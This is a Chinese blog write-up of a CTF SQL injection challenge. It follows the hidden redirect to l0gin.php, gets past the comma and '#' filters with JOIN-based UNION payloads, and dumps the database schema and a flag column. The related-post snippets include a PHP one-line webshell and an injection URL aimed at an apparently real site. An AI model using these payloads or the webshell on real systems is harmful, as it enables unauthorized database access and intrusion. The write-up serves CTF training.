# “百度杯”CTF比赛 九月场SQLi

最新推荐文章于 2023-08-17 18:38:05 发布
最新推荐文章于 2023-08-17 18:38:05 发布
阅读量271 收藏
点赞数
分类专栏: CTF 文章标签: 安全 数据库 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_40845893/article/details/112101616
版权

“百度杯”CTF比赛 九月场SQLi

数据库注入,无逗号union查询构造

求解流程:

  • 进入题目,页面空白,查看源代码
<html>
<head><title>Loading...</title></head>
<body>
	<!-- login.php?id=1 -->
</body>
</html>
  • 根据提示发送GET请求login.php?id=1
welcome admin~</br>
  • 尝试注入,寻找注入点,发送GET请求login.php?id=2
something error~</br>

修改请求,但无论怎么尝试貌似没有用,用sqlmap扫一下,貌似id不存在注入点,没办法,用burpsuite抓包分析一下试试
在这里插入图片描述
在这里插入图片描述

  • 新的请求l0gin.php?id=1(文字游戏真的)
    终于找到真正的登录界面
  • 寻找注入点
    l0gin.php?id=-1’ union select 1,2
    过滤了逗号(%2C),通过尝试也发现过滤了#,但是没有过滤其ascii编码%23
    注入失败,可以发现过滤了逗号(%2C),通过尝试也发现过滤了#,但是没有过滤其ascii编码%23.
  • 关键技术:无逗号UNION注入(利用join)
    构造注入语句l0gin.php?id=id=-1’ union select * from (select 1) a join (select version() ) b %23,发现注入点,
    在这里插入图片描述
    开始爆数据库,id=id=-1’ union select * from (select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA) a join (select version() ) b %23
    成功,数据库sqli之后就简单了,爆表得到users,爆字段得到flag_9c861b688330的属性值,即为flag,
    id=-1’ union select * from (select flag_9c861b688330 from sqli.users) a join (select version() ) b %23
    得到flag

总结:

  1. 注入技巧就是利用union跨表、跨数据库猜解信息,构造的具体注入语句形式类似,内容多样;
  2. 注意绕过网站的过滤限制,无逗号union查询的构造(利用join);
  3. 请求重定向是真的骚,这个点比较隐蔽。
LUV_YOUJUN
关注
专栏目录
百度CTF比赛 九月 SQL
drip_big的博客
04-14 614
百度CTF比赛 九月 SQL 常规流程的注入 题目内容: 出题人就告诉你这是个注入,有种别走! 1 注入点直接给出id=? 用 or 1=1 和 and 1=2测试 结果服务器很耿直的说inj code! 看起来是对输入的参数进行了检测,想办法绕过就行了 得出结果是在敏感语句中加<>就可以,不过像and和or可以直接换成&&与|| 2 order by测试字段长...
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 433
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月 SQLi
feng的博客
09-11 311
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
百度-九月-sql
weixin_43622501的博客
11-25 159
SQL 收获 敏感词的可以用&lt;&gt;, /**/ 来绕过。 sql语句正确的格式。 题目描述: 首先 1=1 被过滤,尝试 and 发现也被过滤;试试绕过 and -&gt; &amp;&amp; or -&gt; || order by 猜长度 .game.ichunqiu.com/index.php?id=1 order by 2 --+ 仍然被过滤,敏感词过滤...
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 326
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 661
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 843
百度CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
百度CTF比赛 十一月Look
wjd19980925的博客
04-13 386
百度CTF比赛 十一月Look
百度CTF比赛 九月--YeserCMS
Oavinci的博客
03-22 587
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 638
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
百度CTF比赛 九月SQLi ---------i春秋
weixin_30907523的博客
07-07 119
题目链接:https://www.ichunqiu.com/battalion 打开链接,创建题目,进入题目环境 发现界面没有显示东西 查看一下源代码 发现源代码里注释了一条信息,login.php?id=1,访问一下 只返回了一条句子welcome admin~,尝试注入,结果没什么发现 进行抓包,访问index.php,在主界面获取到一个信息 刚开始以为和URL上...
[百度] 九月第二周 Sqli writeup
Flyour的博客
04-01 1819
这道sql注入题折磨了我相当久,痛哭流涕啊! 拿到题,访问url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url: http:...
CTF-web】bugku-成绩查询sql注入)
最新发布
Sankkl1的博客
08-17 691
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2743
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1146
ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFweb篇-SQL注入(一)
weixin_44597701的博客
08-12 1512
基本函数和知识 基本数据库information_schema information_schema是一个数据库,放的是一些视图,在SQL文件中找不到。 其中具有表schemata(数据库名)、tables(表名)、columns(列名获字段名) schemata表中有schema_name来存储数据库名 在tables表中,table_schema和table_name来存储数据库名和表名 在columns表中,有table_schema、table_name、column_name 基本函数 user(
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 956
BUGKU CTF--web 基础{成绩查询}解题过程
CTF 简单sql
明月于心的博客
07-25 1280
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
工匠-CTF比赛全解析:题目、解答与思路
在提供的资源中,包含了“工匠比赛”的三道题目、解答(WriteUp)和相关脚本。解答部分详细描述了解题思路,包括如何分析和解决问题的每一个步骤。脚本则可能包含了用于自动化攻击、信息获取、漏洞利用等操作的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值